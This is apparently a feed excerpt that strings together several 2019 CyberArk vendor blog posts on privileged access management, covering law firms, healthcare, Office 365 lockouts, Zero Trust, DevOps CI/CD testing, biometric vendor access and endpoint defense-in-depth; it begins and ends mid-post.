To reduce the risk of insider threats and limit the damage that they can do, organizations should implement privileged access management solutions that offer insider threat protection. The CyberArk Privileged Access Security Solution helps organizations proactively limit user privileges and control access to privileged accounts. It reduces the risk of an insider attack, while providing real-time threat analytics to aid in insider threat detection.

To explore the dangers hidden within your organization and learn five actionable recommendations for reducing the risk of insider threats, download our eBook, “Unmasking Insider Threats” or read our blog post, “Insider Threats Come in All Shapes and Sizes.”

]]>
Law Firms Need to Prioritize Privilege to Protect Client Information https://www.cyberark.com/blog/above-the-law-law-firms-prioritize-privilege-to-protect-client-information/ Thu, 05 Sep 2019 15:24:04 +0000 https://www.cyberark.com/?p=73552

It’s well understood that law offices have access to extremely valuable client information and secrets – just look at the case of the Panama Papers, which implicated many high profile individuals and political leaders with tax fraud and other illegal activities.

There are many ways in which a law firm’s client data can become compromised, but being in the business of privileged access management, we will focus on the importance of locking down the privileged access pathway to protect the valuable data that law firms are entrusted with protecting.  But first, a few observations:

  1. When it comes to securing confidential data, law firms are often not held to the same standards as other service providers. 

Some regulations and standards covering confidential data security do not specifically include law firms in their purview, instead referencing them under generic “covered entity” or “business associate” categories. The Payment Card Industry Data Security Standard (PCI DSS), Health Insurance Portability and Accountability Act (HIPAA) and a few others, do cover law firms and rule that they must maintain certain controls to safeguard sensitive information.

But, is that enough?  And what checks and balances are actually in place to ensure proper safeguards are maintained? Many of these regulations and standards do not actually require law firms to do anything to demonstrate compliance or to make any kind of self-attestation.  Many are not subject to regular audits.

Of course, attorneys have a professional duty to make all reasonable efforts to protect and maintain the confidentiality of client information.  A law firm entrusted with client data must follow ethical and professional conduct rules when handling the data, which includes an obligation to keep the client’s information secure.  However, is an ethical obligation and some loosely enforced requirements enough when it comes to something as important as protecting highly valuable client information and data? Probably not. 

  1. Outside counsel and outsourced professional services often slip past InfoSec.

When an organization invites outside counsel into its network or provides access to confidential information, it introduces third-party risk.  Most organizations don’t do enough to secure third-party vendor access and outsourced legal counsel is often overlooked by InfoSec teams, which significantly increases the security risk.

A large law firm with more than 4,000 attorneys who service some of the largest organizations around the world fell victim to the NotPetya attack a few years ago, disrupting services and costing them millions.  Better endpoint protection is needed as ransomware continues to be a threat to law firms both large and small.  When it comes to access rights, Law firms need to be treated the same as any other remote third-party vendor.

  1. The average law firm frequently uses outdated technology.

Many law firms, especially the smaller ones, lack adequate IT and security awareness and resources. This can lead to them continuing to use old and outdated tools and technology or staying on unsupported and outdated versions of software and ignoring security patch updates issued by their technology providers.   These types of environments are prime targets for attackers to exploit.

For instance, in the case of the Panama Papers, the firm Mossack Fonseca suffered a SQL injection attack on one if its subdomains, which provided access (via an outdated plugin) to a content management system that had a known vulnerability that the firm never patched.  From there, the attackers lifted credentials from a database that Mossack Fonseca’s security had left in clear text.

That was the beginning of the end.  Without adequate security resources to protect client’s personal information, law firms not only bring into question their ability to comply with ethical and professional conduct rules, they also become vulnerable to a potentially devastating cyber attack.

Why Privileged Access Management Matters

One of the most common strategies used by malicious insiders and external attackers is to attempt to gain privileged access in order to execute a successful attack.  Privileged accounts are everywhere – in every networked device, database, application and server on-premises and in cloud and hybrid environments.  Nearly all advanced attacks involve the compromise of privileged credentials.

These credentials provide anyone who gains possession of them the ability to control an organization’s resources, disable security systems and grease the tracks for providing fast access to vast amounts of client information and other sensitive data.  In the wrong hands, access to this data can cause significant business disruption.  Consider the types of client information and documentation these firms have standing access to:

  • Business dealings
  • Trade secrets
  • Personal data
  • Health care information
  • Proprietary information
  • Material non-public information

To mitigate the risk of a serious cyber attack, law firms need to adopt a proactive security solution that specifically addresses their privileged access exposure.  For instance, in the event that the InfoSec team approves access for outsourced counsel or legal services, they will often issue mandates that require the law firm to maintain tight privileged access management controls and robust audit capabilities to ensure that the confidential data they are entrusted with remains safe.

It’s Not Just About Securing Confidential Data; It’s About Securing a Reputation

There are many factors that contribute to a firm’s poor security posture, such as access to security expertise and depth of resources, trained personnel and low IT budgets.  Many small to mid-size firms only have a few employees in their IT departments.  With the overwhelming number of security solutions out in the market to pick and choose from, figuring out where to start when developing a cybersecurity strategy is a daunting task even for a well-staffed IT security team.

One effective way to work with limited staff is to prioritize cybersecurity risk in order to better align with available resources.  Firms should evaluate security solutions based on their ability to mitigate the most risk per dollar spent, with low up front and ongoing cost.  In other words, look for a solution that has minimal operational overhead and is easy to implement and maintain with limited IT staffing resources.

For law firms, reputation is everything.  Doing what’s right for clients and protecting both brand and reputation is an achievable outcome.  CyberArk Privilege Cloud is a Software-as-a-Service (SaaS) solution that provides foundational privileged access security capabilities.  The solution provides organizations, including law firms, with a simple way to securely store, rotate and isolate credentials, monitor sessions and quickly deliver risk reduction to the business.

Download the CyberArk Privilege Cloud datasheet or request a demo today to see how to gain the confidence of clients by securing privileged access to their most confidential information and sensitive data.

]]>
Three Ways for Healthcare to Handle Cyber Threats https://www.cyberark.com/blog/three-ways-for-healthcare-to-handle-cyber-threats/ Tue, 03 Sep 2019 21:11:02 +0000 https://www.cyberark.com/?p=73514

The cost of a data breach has surged over the past five years to almost $4 million per breach. Yet, while every industry is a target, some are being hit harder than others. A recently released study shows that healthcare organizations face an average of $6.5 million per incident, which is about 60 percent higher than other industries.

The modernization of networks, increase in merger and acquisitions (M&A) and Internet of Medical Things (IoMT) makes healthcare a particularly attractive target for cyber attackers. Add the growing need to share information and it’s easy to see why healthcare breach costs are soaring.

Bryan Murphy, Director, Consulting Services – Americas, recently wrote a series of articles for HealthcareITNews, exploring the evolving healthcare threat landscape and outlining steps providers should take to strengthen their overall cybersecurity posture. Following are highlights:

Prioritizing Privilege to Protect Patient Data

Fast-expanding, interoperable care delivery networks generate huge volumes of patient data – or Electronic Personal Health Information (ePHI). From birth dates and social security numbers to private health concerns and detailed illness histories, healthcare information can be much more valuable to cyber attackers than credit card numbers. Furthermore, external attackers are not the only threat: A recent study shows that one in five healthcare employees would be willing to sell sensitive information to unauthorized parties for less than $1,000.

Healthcare organizations need privileged accounts and credentials for administrators to access applications or data, or for devices to access the systems created by the technological advances of the past two decades – especially ePHI. For example, cloud-based Electronic Health Record (EHR) applications, patient diagnostic data integration from third-party services and payer organization reimbursement processes all require privileged access. Cyber attackers recognize this and look for ways to exploit weak points across the continuum of care to find and use to escalate privileges and get their hands on ePHI.

According to industry experts, protecting privileged access is the single best way to mitigate risks associated with ePHI theft and the people and devices that can access it. Learn more by reading the full HealthcareITNews article.

Healthcare Can’t Wait for Device Makers to Prioritize Security

Internet-connected medical devices – such as infusion pumps, heartrate monitors and even imaging and biopsy tables – have become a critical part of the healthcare environment. However, this broad movement of connected devices represents a growing cybersecurity threat that puts patient data, medical information and, potentially, patient wellbeing at risk.

Securing connected devices – both unsupported legacy devices and new IoMT devices – has emerged as one of the top priorities for healthcare IT security professionals. In fact, medical devices now outnumber healthcare industry staff three to one.

Healthcare leaders are prioritizing establishing privileged access controls to secure and manage the accounts, credentials and secrets that can give users wide-ranging powers on a device, network or third-party application. Read the full HealthcareITNews article for more details.

How Healthcare CISOs Can Triage IT Risk

As the healthcare industry embraces digital transformation, ransomware and insider threatsthird-party breaches are getting more sophisticated and more difficult to prevent. Healthcare CISOs must mitigate the dangers of these daily threats and, at the same time, quantify cybersecurity risk in dollars and cents.

To do this effectively, healthcare CISOs need to understand how every employee, application and IT technology impacts their risk profile. This requires a redefinition of the way they assess risk and new skillsets and tools to help make the right cybersecurity investment decisions.

By understanding the threats and outcomes that could have the greatest impact on both the bottom line and day-to-day care of patients, healthcare CISOs can more effectively identify potential cyber threats and where the greatest impact is to the organization. Learn more about cybersecurity measurement and reporting, as well as frameworks that help quantify risk and risk mitigation ROI, in this HealthcareITNews article.

Healthcare providers require strong privileged access management (PAM) to minimize risk and protect their investments in integrated care delivery networks. The CyberArk Privileged Access Security Solution helps providers protect ePHI, secure complex delivery networks, safeguard investments and deliver quality patient care with confidence. Learn more in our eBook, infographic and on-demand webinar.

 

 

]]>
How to Prevent Office 365 Account Lockouts https://www.cyberark.com/blog/how-to-prevent-office-365-account-lockouts/ Tue, 03 Sep 2019 14:27:11 +0000 https://www.cyberark.com/?p=98973

Office 365 lockouts are a major employee productivity issue – here are tips and tricks to stop account lockouts.

Active Directory account lockouts caused by brute force attacks on Office 365 are one of the top reported issues for Office 365 customers. According to Microsoft, there are more than 300 million fraudulent sign-in attempts every day. Because a breach may not have occurred, it is not the highest security concern. Nevertheless, it is a major employee productivity issue and overloads IT with support cases. If your Office 365 domain is federated with Idaptive, here are four things that can help stop account lockouts caused by brute force attacks on Office 365.

  1. Disable legacy email protocols such as SMTP, POP, and IMAP. Protocols that use basic authentication are vulnerable to scripted brute force attacks and do not support multi-factor authentication or Microsoft’s Conditional Access policies. These protocols are rarely used nowadays but enabled by default in Office 365.
    1. Enable Office applications to use modern authentication – Details here
    2. Disable legacy protocols for mailbox accounts. You can disable for all users but leave it enabled for specific user accounts that may still need it, for example SMTP for an account used by a network printer. Details here
  2. Go passwordless with multi-factor authentication. Replace password authentication with non-password authentication, to avoid wrong passwords from being entered. Here is a brief video demonstration of how Outlook can be set up without a password.
    1. Enable passwordless authentication for the Idaptive User Portal login.
    2. Optionally enable passwordless authentication at the app level if there is a security requirement for additional MFA.
  3. Restrict how email is accessed on mobile devices.
    1. Use the Outlook mobile app instead of the native email client. Native email clients use the ActiveSync protocol, which does not use modern authentication. The Outlook mobile app supports modern authentication and will redirect users to Idaptive for passwordless authentication.
    2. Implement MDM/EMM for mobile devices to:
      • Enforce a passcode on the device.
      • Have the ability to wipe the device if lost or stolen.
      • Have the ability to remotely remove (selectively wipe) the Outlook mobile app from a BYOD/personal device, when the employee no longer works for you.
    3. Implement ActiveSync quarantine to control which devices can access email via ActiveSync. Details here

Looking to get started with Idaptive? Check out our free 30 day trial here.

]]>
Next-Gen Access and Zero Trust are the PB&J of Security https://www.cyberark.com/blog/next-gen-access-and-zero-trust-are-the-pbj-of-security/ Thu, 29 Aug 2019 19:45:43 +0000 https://www.cyberark.com/?p=98925

I recently wrote about how to deal with old technologies when a company is switching to a new security philosophy (tl;dr: Don’t just rip and replace!). Today, we’re going to look at the other side of the same coin. What happens when an organization is ready to achieve Zero Trust nirvana – that sought-after state of freedom from suffering and rebirth every CISO and IT pro spends their lives trying to achieve?

There are two planes that lead to this bit of transcendence. The first is philosophical, which we’ve discussed: A reckoning that the current security strategy isn’t good enough, and having the entire security team fully bought in to Zero Trust. The second is technological and it’s called Next-Gen Access.

Next-Gen Access is a technological approach to identity and access management (IAM) that marries modern single sign-on (SSO), adaptive multi-factor authentication (MFA), provisioning and lifecycle managementendpoint and mobile security, and user behavior analytics into one platform. It’s the perfect technological partner to a Zero Trust approach because its sole purpose is to reduce friction, add efficiency, and increase capabilities.

Next-Gen Access solutions are better equipped to enable a Zero Trust approach to access with advanced capabilities that intelligently determine the authenticity of a digital user and their device, govern access across an organization’s resources, and react when risky behavior is detected. This bolsters an organization’s security posture while also improving end user experiences, making everyone more productive.

It’s a platform approach to security, combining all the tools necessary to create a true Zero Trust environment, with the added benefit of integrated out-of-the-box, day-to-day management features and a synergy between all the tools on the platform that enable things like broad contextual awareness, increased automation, and real-time decision making.

Next-Gen Access provides three main benefits when paired with Zero Trust:

  1. It vastly improves user experience. Traditionally, adding more authentication factors increases security, but also increases friction, making the people using the apps and services less happy, less productive, and more prone to poor security hygiene. Next-Gen Access is able to marry three separate technologies (single sign-on, adaptive multi-factor authentication and user analytics) to discover the context around areas where additional friction should — and most importantly, should not— be added. Is this person using an app or service in a different way than they usually do? Are they in a location they’ve never been before, or on a device that’s never been used to log in? If the answer is yes to any of these, the risk is increased and the system can throw up an additional level of verification. If not, then the risk level is decreased as they most likely are who they say they are and can smoothly use the app without having to log in, creating a frictionless experience.
  2. It’s easier on IT. Reducing the burden on IT is an almost universal goal in every company. After all, what’s the goal of an IT business unit? They are not in the business of making things harder for people. They help facilitate new approaches to business, digital experiences and so on. Next-Gen Access gives them time for that, rather than writing and managing access to myriad static access rules. There’s also the opportunity cost from not having to invest time and money in a Frankenstein identity solution when Next-Gen Access is integrated under one umbrella. One set of tools to implement, configure and roll out. And an added bonus: buying from one vendor is almost always cheaper.
  3. Next-Gen is where the best and most recent thinking is happening. Innovation is not happening for on-premise software and appliances – those will always provide the same, static experiences for IT and users. Developers and IT are focused on Next-Gen Access solutions where they have the ability to use things like artificial intelligence, massive data pools, and seamless interoperability between thousands of cloud apps to build things like automation, deep context, and more into apps and services.

 

Think of Zero Trust and Next-Gen Access like you would a road trip. Zero Trust is the map that tells you how to get to where you want to go, while Next-Gen Access is the car. It’s easier and more comfortable to get into a brand new Audi, get up to speed, set the cruise control and go than it is to drive an old Volkswagen Bug with a stick shift. (Or worse, buy a separate engine, body, wheels, and seats from different vendors and “integrate” your own car.)
Most importantly though, a Next-Gen Access approach frees up IT to be an enabler. We in the security business sometimes get stuck on stopping breaches as the end all to be all. That’s obviously important, but what happens after the breaches are stopped? The focus then needs to turn back to helping the business — the original purpose of IT. Next-Gen Access helps make the security aspect of security solutions fade into the background so the enabling aspect can come into focus and become a foundational piece for new customer experiences or new ways to think about identity and how it can enable productivity.

That’s what I call nirvana.

*****************************
Read the Zero Trust series here:

Zero Trust Series – 1  What Is Zero Trust and Why Is it So Important?

Zero Trust Series – 2 Like the Night King, Perimeter Defense is Dead

Zero Trust Series – 3 Imposter Syndrome: Why You Can’t Separate the “Good Guys” from the “Bad Guys”

Zero Trust Series – 4 Passwords are Just one Piece of the Cybersecurity Puzzle

Zero Trust Series – 5 The Future of Cybersecurity is Artificial: Intelligence Will Transform Enterprise Governance

Zero Trust Series – 6 Protect, Detect, Deter, Respond is Not a Security Strategy.

Zero Trust Series – 7 Upping the Security Ante: How to Get Teams’ Buy-in for Zero Trust

Zero Trust Series – 8 Next-Gen Access and Zero Trust are the PB&J of Security

Zero Trust Series – 9 Passwords Need Fixing. Zero Trust is the Solution.

Zero Trust Series – 10 The One-Two Punch of Zero Trust. Verify Every User, Validate Every Device.

Zero Trust Series – 11 “Should I Stay or Should I Go?” Artificial Intelligence (And The Clash) has the Answer to Your Employee Access Dilemma.

Zero Trust Series – 12 Grow Up! Plotting Your Path Along the Zero Trust Maturity Model

]]>
Four Things Security Can Do to Keep Up with DevOps CI/CD https://www.cyberark.com/blog/four-things-security-can-do-to-keep-up-with-devops-ci-cd/ Tue, 20 Aug 2019 13:00:45 +0000 https://www.cyberark.com/?p=72168 DevOps CI/CD Security

Editor’s Note: Part 4 of a 5 part series providing practical guidance and insights to security leaders for securing DevOps environments. This series is based on insights from Global 1000 Chief Information Security Officers (CISOs.) This installment covers how security teams can adapt processes for modern application testing. This series includes information on how to:

  1. Transform the security team into DevOps partners
  2. Prioritize securing DevOps tools and infrastructure
  3. Establish enterprise requirements for securing secrets and credentials
  4. Adapt processes for application testing
  5. Evaluate the results

With the promise of shorter development cycles more closely aligned with business objectives, organizations are embracing DevOps for everything from insurance customer service and banking applications to mobile check-in and loyalty apps. With the push to be fast, agile and accelerate digital transformation initiatives, DevOps is perfectly suited to deliver high-value applications that can be rapidly iterated and scaled. Yet, while DevOps is increasingly essential for today’s digital business, it exposes new privileged access management-related risks that security teams must address.

This is particularly true when it comes to Continuous Integration, Continuous Delivery (CI/CD). Using Continuous Integration (CI), development teams can merge code changes to a repository and automatically integrate it into builds multiple times a day. Continuous Delivery (CD) requires that code always be in a deployable state so that it can be deployed to production at any time at the touch of a button.

Traditionally, security teams could put up “gates” in the development process to check that the application met security requirements before it was delivered. But with CI/CD, these gates no longer fit the deployment model and security teams will need to rethink and update their processes.

In this chapter of our CISO View Insights blog series, we’ll explore four ways that security teams can evolve their processes to keep pace with continuous application delivery while upholding key privileged access management requirements. These recommendations are based on the real-world experiences of CISOs from Global 1000 organizations.

  1. Integrate Automated Code Testing for Security Issues

Security teams should work to automate as much application testing as possible using a  combination of custom scripts and commercial services.

An automated enforcement engine can perform tasks such as scanning code for secrets before it is checked into a repository. Automatic scanning can identify vulnerabilities and malicious code within applications quickly, an especially important benefit when working at the speed of DevOps. It can also make sure that applications – including any third-party code modules – retrieve secrets correctly from a centralized, encrypted vault. By automating testing and enforcement, security teams can also ensure that passwords are not recorded in event logs.

  1. Force Developers to Fix Security Issues with a “Break the Build” Approach

With automated testing, a test failure, gives security teams a new way to drive and influence developer behavior to uphold important cybersecurity requirements. A “break the build” approach forces developers to fix the security issues in their code, since, until the problems are fixed, the developers won’t be able to deliver their code module. This approach also puts pressure on the security teams to have effective test programs and, ideally, to be able to rapidly guide developers to what they need to do to fix their security issues.

With a “break the build” approach, risk scoring becomes integral to build automation tools, so that when the risk exceeds a certain threshold, the build will automatically break.

In addition to implementing “break the build,” security teams should continue looking for ways to check for security issues earlier in the process, such as on code check-in or merge. The goal should always to be to enforce application security policies as far left in the process as possible to mitigate the most risk.

  1. Maintain Manual Testing and Red Team Exercises

While integrating automated testing is essential, it cannot stop there. Remember that attackers are creative and persistent, and will often find ways to bypass the issues that automatic security tests are designed to find.

To catch these increasingly sophisticated attackers and stop attacks before they impact business, organizations must adopt an attacker’s mindset. To do so, use a combination of automated static and dynamic testing, as well as manual penetration testing. When pentesting, security teams should test both the tools used to roll out the application and the application itself. Periodic Red Team exercises can also be very helpful in uncovering vulnerabilities, identifying areas of improvement and making risk-prioritized recommendations.

  1. Consider Launching a Bug Bounty Program

Security teams can supercharge their ability to identify and address DevOps security risks and weaknesses by implementing a bug bounty program. With such a program, the company invites security researchers to find security issues, and pays a reward for issues found and confidentially reported.

Security researchers can find out, for example, if practitioners are embedding credentials in code or in DevOps tools, so that teams can quickly course-correct. The program can also help DevOps teams become more accountable for security. Furthermore, tracking the results can provide an ongoing visual record of security issues and their financial cost to the company.

Before launching a bug bounty program, it’s very important to set up a formal operating agreement between the organization and security researchers that establishes the expectation that the researchers will do no harm. As part of this, make sure executive leadership team understands the nature of the program and the norms of the security researcher community – and maintain transparency throughout the process.

Security needs to embed and integrate security processes into the automated CI/CD processes, such as with automated testing and break the build approaches. Additionally, security needs to step out of the box and set up processes to hunt down and identify the risks and vulnerabilities that “cannot happen.” This means using pen-testing, red teams, bug bounties and other creative approaches to find and address issues before attackers do.

Lastly, security should continue to collaborate with developers and remind that that developers and security professionals share responsibility for security. It’s important for developers to understand that what security wants is to help development teams ensure that the applications they deploy are secure.

For more insights on bringing DevOps culture and security teams into alignment to better secure today’s digital business, download the full CISO View report, Protecting Privileged Access in DevOps and Cloud Environments, watch a short highlights video or tune into our on-demand webinar.

]]>
Biometric Authentication Key to Remote Access for Vendors https://www.cyberark.com/blog/biometric-authentication-key-to-remote-access-for-vendors/ Thu, 15 Aug 2019 13:00:55 +0000 https://www.cyberark.com/?p=72003 Biometric Authentication for Remote Access

Many organizations today rely on contracted remote vendors to manage critical systems, freeing themselves up to focus on their own core competencies. However, the fact that these vendors operate remotely further breaks down the traditional IT perimeter and introduces a new challenge — ensuring that remote vendors have proper access to the specific systems that they need while only providing access when they need it. Organizations often track who is accessing what systems or assets within their environment using the first step of authentication – where users or machines somehow prove that they are who (or what) they say they are. It’s only when every remote vendor user is identified and authenticated that the process of granting (and removing) access can begin.

Relying on manual processes to provision and de-provision access to remote vendors is far from foolproof and introduces lots of potential issues. Remote vendors are contracted for only specific periods of time and, typically, aren’t part of the Active Directory or other directory services. They also usually only need access to a specific subset of systems, bound by either the length of their contract with the host organization or the number of sessions it takes to complete their tasks. Manual processes often lead to any combination of: over-provisioning access so that remote vendors get access to systems they don’t need, under-provisioning access and making it difficult for the remote vendors to do their jobs or leaving unnecessary standing access for the vendor long after it’s moved on.

Bring-your-own-device policies have become the norm for remote access, making the job of the IT security team that much harder and further breaks down the “perimeter” as we know it.  IT teams need a way to ensure that these devices are secure even when they’re accessing critical systems from afar.  Zero Trust focuses security policies and access controls on user and device identity rather than the location of the user or the device. This affects what the ideal method of authentication is.

Proving identity through authentication, whether outside or inside the office, can take many shapes. Examples include classics like entering a username and password combination or more modern methods like biometric recognition systems or using a trusted and known device. At a high-level, authentication typically takes three forms:

  1. Something you know. Examples: A secret word or a username and password combination
  2. Something you have. Examples: Your smartphone or a name badge
  3. Something you are. Examples: A fingerprint or a retina scan

These are the three top-level forms of authentication, but there are countless technological advances that introduce ways for companies to regulate and track who’s accessing what. One thing that’s typically recommended, especially for critical assets, is instituting an additional layer of security with multi-factor authentication, which requires users to utilize more than one method of proving their identity. This can include something they know, like the answer to a security question or something they have, like a text message confirmation sent to a cell phone.

Up until recently, authentication for remote vendors has typically leveraged VPNs, which provide sweeping network access for remote users. While VPNs do have security measures in place to attempt to verify identity, they often allow remote vendors unfettered access to systems that they don’t need to access. Some organizations opt to ship corporate laptops to their remote vendors, only granting access through these remote computers. Agents installed on the laptops ensure that remote vendors only access the systems they’re supposed to. This falls back on the “something you have” form of authentication and leaves organizations susceptible to laptop theft or damage.

“Something you know” and “something you have” are both methods with inherent blind spots. “Something you know” can be figured out by someone else. Cyber attackers have a 30-year history of cracking loosely protected passwords. “Something you have” can be stolen or intercepted. Mobile devices, corporate laptops and the equivalent, being portable, are all very vulnerable to this.  So, organizations look for new ways to secure their most sensitive internal systems. People lose their devices or re-use passwords more often than we care to admit. But, your fingerprint, for example, will always be unique patterns. Using a retina or fingerprint scan instead of a password or a company phone can remove avenues of attack and improve security while also making for a smoother process for the end-user.

By introducing a better form of biometric authentication, organizations can provide remote vendors with a stronger and more convenient method of confirming their identity. However, managing all of that can be a lot of work. Most of the common methods require establishing back-end policies and strategies to ensure that users are only accessing the systems that they need for their jobs, provisioning this access when it’s needed and de-provisioning access when the need is over. Until recently, there wasn’t a good solution to this problem.

Biometric authentication is particularly suited for Zero Trust for the same reason that it’s ideal for authenticating remote vendors – biometric authentication can’t be stolen, lost in transit, forgotten or figured out. For this reason, organizations using the Zero Trust security model often choose biometric authentication to verify their remote vendors. Combining biometric authentication with a strong backend solution enables organizations to provide only the right access to remote vendors and automatically provision and de-provision. That is exactly what CyberArk Alero does.

Learn more about CyberArk Alero, a new SaaS-based solution from CyberArk. Alero combines Zero Trust access, biometric authentication and just-in-time provisioning to secure remote vendors accessing critical systems managed by CyberArk. It doesn’t need VPNs, agents or passwords and creates a seamless and secure experience for IT administrators, operations teams and remote vendor users.

]]>
Five Tools for a Defense-in-Depth Strategy for Endpoints https://www.cyberark.com/blog/five-tools-for-a-defense-in-depth-strategy-for-endpoints/ Wed, 14 Aug 2019 13:29:37 +0000 https://www.cyberark.com/?p=71975 Defense-in-Depth

Today’s digital workforce looks very different than it did 10 – even five – years ago. Employees, contractors and vendors are spread across multiple locations, some work remotely, and most use a variety of mobile devices to do their jobs. These increasingly distributed teams still need a way to access data and assets whether from the corporate network or the cloud. But, now they need that access to work across many different locations and devices.

With the expanding attack surface, cyber attacks on the endpoint, such as phishing and ransomware, need to be taken seriously. In the CyberArk Global Advanced Threat Landscape 2019 Report, 60% of respondents identified external attacks, such as phishing, as one of the top security risks for their organization and 59% of respondents identified ransomware as a top security risk.

What is Endpoint Security?

Coined in recent years, “endpoint security” is a term used widely by security professionals at cybersecurity events and conferences and on blogs and webinars. The actual definition of “endpoint security” varies widely depending on who you ask.

To understand the true definition of endpoint security, it’s first important to define what an endpoint actually is. An endpoint is any user device that connects to an enterprise network. This can include, but is not limited to, laptops, desktops, tablets, mobile phones and servers. Each of these endpoints provides an entry point to applications and corporate assets.

A Defense-in-Depth Strategy for Endpoint Security: Five Essential Tools

Historically, enterprises protected their laptops, desktops and servers with a firewall and perhaps an antivirus solution. But, as security threats evolve and digital transformation strategies accelerate, it has become clear that a more comprehensive, defense-in-depth approach is necessary to effectively mitigate risk. Since there is no silver bullet for endpoint protection, modern organizations must utilize a mix of advanced methodologies and tools. In this blog, I will outline the five technologies you must have in place to keep your laptops, desktops and servers secure.

The five key technologies you need to secure your endpoint.
  1. Endpoint detection & response (EDR). Endpoint detection and response is a technology that addresses the need for continuous monitoring and response to advanced threats. Endpoint detection and response solutions collect, record and store large volumes of data from endpoint activities to provide security professionals with the comprehensive visibility they need to detect, investigate and mitigate advanced cyber threats.
  2. Antivirus or next-gen antivirus. For as long as endpoints have been, and will be, in existence (whether connected to the Internet or not), there has and will always be a need for antivirus solutions. There will never be a time when people – from mischievous youths seeking thrills to hardened cybercriminals looking to exploit billion-dollar companies – will stop looking to find ways to commit fraud, cause widespread damage or just experience the rush of breaking into a computer. Not every type of cyber attack can be prevented with antivirus software, but it’s an important tool to have in your cybersecurity toolset.
  3. Privilege management. Also known as the principle of least privilege (POLP), this is a concept and practice for limiting access rights for users and running processes only for those who absolutely require them to perform their tasks. Implementing least privilege management means enforcing the minimal level of user rights – or permissions – that allow the user to perform his or her designated role in the organization. As the endpoint attack surface continues to expand across digital enterprises, least privilege enforcement is a critical component of endpoint security, necessary for reducing the risk.
  4. Application patching. Software updates are important to your digital safety and overall cybersecurity. The sooner you update, the sooner your endpoint device will be more secure — that is, until the next update. With software updates, it’s all about revisions. These might include fixing newly discovered security holes or fixing or removing bugs. The challenge with patching is that it’s a never-ending job. In fact, studies show it takes enterprises an average of 38 days to patch a security flaw, also known as a software vulnerability. Hackers target these weaknesses by writing code for the software program vulnerability and packaging it into malware. Updating your software is an important step for keeping hackers out.
  5. Operating Systems (OS) patching. Similar to application patching, operating systems also need patching from time to time. OS patches can include critical updates, which, as the name implies, are widely released updates that apply a critical patch to a non-security-related bug. A security patch, on the other hand, is a widely released update that applies a patch to a security-related vulnerability. For instance, each Microsoft patch is accompanied by a Knowledge Base (KB) article identifier. Contained in a repository of over 200,000 articles, these KBs provide in-depth explanations about what was patched, how, the impact and any additional information that the end-user may find useful or necessary, such as Common Vulnerability and Exposures (CVE) identifiers that the update addresses. Apple releases its own equivalent of these OS patches. For security patching, they use “security updates cumulative” and operating system upgrades occur on supported hardware. To be truly effective, OS patching must be continuous, not just relegated to specific “patching periods.”

On Beyond Antivirus

Endpoint detection and response, antivirus software, privilege management, application patching and OS patching are each, individually, major contributors to the security of your endpoints. However, to be sure that your laptops, desktops and servers are as protected as possible, you need all five of the essential tools working together.

Many organizations depend upon antivirus software alone to keep their endpoints secure, but that isn’t enough. Privilege management is a key part of the successful security strategy. Establishing a policy of least privilege is essential for this. If you establish access control to ensure that no person has access to more than they need at any given time, it makes it much harder for attackers to escalate privileges and take aim at vital assets. CyberArk is the global leader in privileged access management and CyberArk Endpoint Manager can help your organization institute a policy of least privilege and get started on your journey to defense in depth.

Thinking about taking the next step to reduce your endpoint attack surface and strengthen your overall cybersecurity? Think least privilege. To discover more benefits of CyberArk Endpoint Privilege Manager, visit here.

]]>
5 Reasons to Prioritize Privileged Access Management (PAM) https://www.cyberark.com/blog/5-reasons-to-prioritize-privileged-access-management-pam/ Thu, 08 Aug 2019 13:00:37 +0000 https://www.cyberark.com/?p=71699 Privileged Access Security, principle of least privilege, reduce the risk

Finding the right aspects of cybersecurity to prioritize can present significant challenges. Organizations often lack sufficient resources to deal with emerging threats from both a personnel and budget standpoint. With the limited budgets they do have, security leaders are faced with the “share of wallet challenge.”

Can they effectively utilize existing security investments across complex application stacks and infrastructure while still prioritizing new initiatives? Making matters worse, there’s a never-ending line of solution providers knocking on their doors and competing for time and attention.

Since you cannot do everything, what should you do? When working to prioritize cybersecurity projects and programs, it’s important to think about how security can be a business enabler – not a blocker – for your organization. If you’re a security leader, you want to help drive the conversation with the business about the value of applying strong cybersecurity to modern technologies, not only to mitigate risk and maintain a strong security posture, but also to improve operational efficiencies.

CyberArk recently held a webinar to describe five reasons why securing privileged access is so important and why it should be at the top of your list for security projects and programs for 2019 and beyond. Following are the highlights. To explore these further, and view technical demos, tune in to the on-demand webinar. 

  1. Privileged access is the route to your most critical assets.

In deconstructing publicized cyber attacks, there is often a privileged access-related connection.  Privileged access is the gateway to an organization’s most valuable assets and is at the core of nearly every major security breach today.

Here’s a look at a typical (albeit unsophisticated) attack scenario to illustrate this: An attacker sends a successful phishing email to an employee to establish a beachhead of operation on an endpoint. After establishing persistence, the attacker escalates their privileges to gain access to a server account that uses the same credentials. From there, they can move laterally to access target critical assets and data and, ultimately, cause business damage or disruption.

With more users, devices and applications than ever before in digital-first organizations, many security teams are struggling to maintain  visibility across their privileged accounts and credentials on-premises, in the cloud and in DevOps environments – let alone manage who has access to what. Yet, privileged access is often an organization’s last line of defense and, therefore, should be the strongest. Securing the privileged access pathway must be top priority.

  1. To err is human.

Humans are… well, human. It doesn’t take much for someone to mistakenly click on a phishing email link or attachment or unintentionally download malicious code on their machine and set off a chain reaction throughout the network. In fact, the 2019 Verizon DBIR report notes that 32 percent of all breaches involve phishing campaigns.

Not only do people make mistakes, they’re often lax when it comes to strict adherence to security best practices – especially if it impacts their productivity. If they can take shortcuts for connecting to sensitive systems, applications and data, they usually will.

And guess what? Cyber attackers are look to take advantage of ‘low hanging fruit.’ They don’t want to breach a network and then camp out for days or weeks if they don’t have to.

Instead, attackers can target an organization’s cloud console and immediately gain access to their most business critical applications. To stop them, privileged access management (PAM) is paramount.

  1. Privilege doesn’t stop with humans.

In a typical enterprise, the machines and applications that require privileged access to run various routine and important tasks vastly outnumber the actual human users that require privileged access. These non-human identities – from enterprise IT ticketing systems to vulnerability scanners to service accounts – need to be discovered, managed and secured.

As organizations extend their digital transformation strategies to include things like robotic process automation (RPA), they introduce hundreds – even thousands – of new non-human identities that require privileged access and, consequently, expand the attack surface. Managing all of these identities is increasingly important as organizations embrace Zero Trust frameworks.

Implementing a comprehensive privileged access management program will allow your organization to effectively monitor where privileged access exists at every layer, understand which users (both human and non-human) have access to what, detect and alert on malicious or high-risk activity and enhance overall cybersecurity. 

  1. Privilege exists on all employee workstations and endpoints.

Having administrative account access on every workstation creates a huge security gap, as cyber attackers increasingly target the endpoint. Limiting access by removing local administrative rights is critical. It’s a security best practice and, fortunately, it can be easy to do. But it doesn’t stop there.

